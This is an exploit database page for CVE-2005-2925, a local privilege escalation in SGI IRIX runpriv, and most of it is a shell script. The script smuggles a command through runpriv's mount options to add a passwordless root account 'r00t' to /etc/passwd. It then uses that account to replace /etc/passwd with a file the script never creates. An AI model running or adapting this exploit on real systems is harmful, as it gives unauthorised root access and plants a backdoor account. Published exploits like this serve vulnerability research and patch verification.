SGI IRIX <= 6.5.28 (runpriv) Design Error Vulnerability



EDB-ID: 1577 CVE: 2005-2925 OSVDB-ID: 19907
Author: n/a Published: 2005-10-10 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next 
#!/bin/sh
# Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=312

/usr/sysadm/bin/runpriv mountfs -s test -d / -o |
  "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'"
su r00t -c "chown root:sys /tmp/passwd123 ;
mv /tmp/passwd123 /etc/passwd ;
chmod 644 /etc/passwd ; su" 

# milw0rm.com [2005-10-10]






Comments

No comments so far